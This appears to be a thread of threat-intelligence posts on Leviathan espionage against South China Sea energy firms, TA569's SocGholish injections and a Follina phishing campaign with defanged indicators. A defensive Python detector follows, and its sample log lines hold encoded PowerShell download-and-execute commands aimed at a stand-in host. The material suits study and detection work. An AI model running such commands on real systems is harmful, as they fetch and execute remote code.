Researchers at @proofpoint identified RTF template injection campaigns from June 2021 - March 2022 targeting hydrocarbon exploration & offshore energy sectors just before Chinese Coast Guard intervention at key sites, indicating a tie between cyber espionage & manned maritime ops.
A full technical analysis of this years-long cyber espionage operation was published earlier this year alongside talented guest author @cyberoverdrive! ow.ly/wLSW50LzmpM
Key technical & temporal correlations may indicate that Leviathan, as a CN MSS contractor, may be servicing the intelligence needs of the CN Coast Guard. The 2021 CCG Law requires the CCG to patrol and prevent foreign energy operations in contested waters of the South China Sea.
Contested sovereignty claims in the South China Sea have given rise to increasing grey-zone conflict in the region, which now clearly includes the support of known nation-state APT actors.
While the most prominent case of kinetic maritime support was observed in Malaysia, Leviathan also was seen targeting the supply chain of Taiwanese windfarms in March 2022.
With the global #offshoreenergy sector growing in the #SouthChinaSea and grey-zone conflict expanding, @threatinsight forecasts that known APTs will continue to conduct cyber espionage in the region in the future.
Proofpoint Threat Research has observed intermittent injections on a media company that serves many major news outlets. This media company serves content via #Javascript to its partners. By modifying the codebase of this otherwise benign JS, it is now used to deploy #SocGholish.
We track this actor as #TA569. TA569 historically removed and reinstated these malicious JS injects on a rotating basis. Therefore the presence of the payload and malicious content can vary from hour to hour and shouldn't be considered a false positive.
Proofpoint observed TA569 injects within the assets of a media company used by multiple major news orgs. More than 250 regional/national newspaper sites have accessed the malicious Javascript. The actual number of impacted hosts is known only by the impacted media company.
Proofpoint blocked a suspected state aligned phishing campaign targeting fewer than 10 Proofpoint customers (European gov & local US gov) attempting to exploit #Follina / #CVE_2022_30190.
This campaign masqueraded as a salary increase and utilized an RTF (242d2fa02535599dae793e731b6db5a2) with the exploit payload downloaded from 45.76.53[.]253.
The downloaded Powershell script was base64 encoded and used Invoke-Expression to download an additional PS script (dbd2b7048b3321c87a768ed7581581db) from seller-notification[.]live.
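The chain described in the thread above (document spawns PowerShell, base64-encoded content, Invoke-Expression fetching a second stage) is the kind of thing a defender wants to surface from process-creation telemetry. The following is an added detection example written for this page, not Proofpoint's code; the log format, the ps_encode helper, and the stage2.example URLs are constructed assumptions.

```python
import base64
import re

# Hypothetical helper used only to build the constructed sample lines: PowerShell's
# -EncodedCommand expects base64 of UTF-16LE text, which is what this produces.
def ps_encode(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample process-creation records (assumed "parent=... cmd=..." format).
SAMPLE_LOGS = [
    "parent=winword.exe cmd=powershell.exe -w hidden -enc "
    + ps_encode("IEX (New-Object Net.WebClient).DownloadString('http://stage2.example/s.ps1')"),
    "parent=explorer.exe cmd=powershell.exe -NoProfile -Command Get-Service",
    "parent=winword.exe cmd=powershell -c \"iex ([Text.Encoding]::UTF8.GetString("
    "[Convert]::FromBase64String('"
    + base64.b64encode(b"Invoke-WebRequest http://stage2.example/p.ps1").decode("ascii")
    + "')))\"",
    "parent=cmd.exe cmd=powershell.exe -EncodedCommand " + ps_encode("Get-Date"),
]

# Common spellings of the encoded-command switch, and base64 literals decoded in-script.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
IEX = re.compile(r"\bInvoke-Expression\b|\biex\b", re.I)
DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)

def decode_layers(cmd: str) -> str:
    """Return the command line plus every base64 layer that decodes cleanly."""
    text = cmd
    for m in ENC_FLAG.finditer(cmd):  # -enc payloads are UTF-16LE by definition
        try:
            text += "\n" + base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            pass
    for m in B64_LITERAL.finditer(cmd):  # in-script literals: try UTF-8, then UTF-16LE
        try:
            raw = base64.b64decode(m.group(1))
        except ValueError:
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                text += "\n" + raw.decode(enc)
                break
            except UnicodeDecodeError:
                continue
    return text

def analyze(cmd: str) -> dict:
    """Flag encoded PowerShell that both evaluates code (IEX) and pulls content from the network."""
    decoded = decode_layers(cmd)
    encoded = bool(ENC_FLAG.search(cmd) or B64_LITERAL.search(cmd))
    hits = {"encoded": encoded, "iex": bool(IEX.search(decoded)),
            "download": bool(DOWNLOAD.search(decoded)), "urls": URL.findall(decoded)}
    hits["suspicious"] = encoded and hits["iex"] and hits["download"]
    return hits

def scan(lines):
    """Return only the log lines whose command line matches the encoded IEX-download pattern."""
    return [line for line in lines if analyze(line.partition("cmd=")[2])["suspicious"]]
```

The decoded URLs in the result give the second-stage host to pivot on in proxy or DNS logs; a matching line where the parent is an Office process is the strongest signal here.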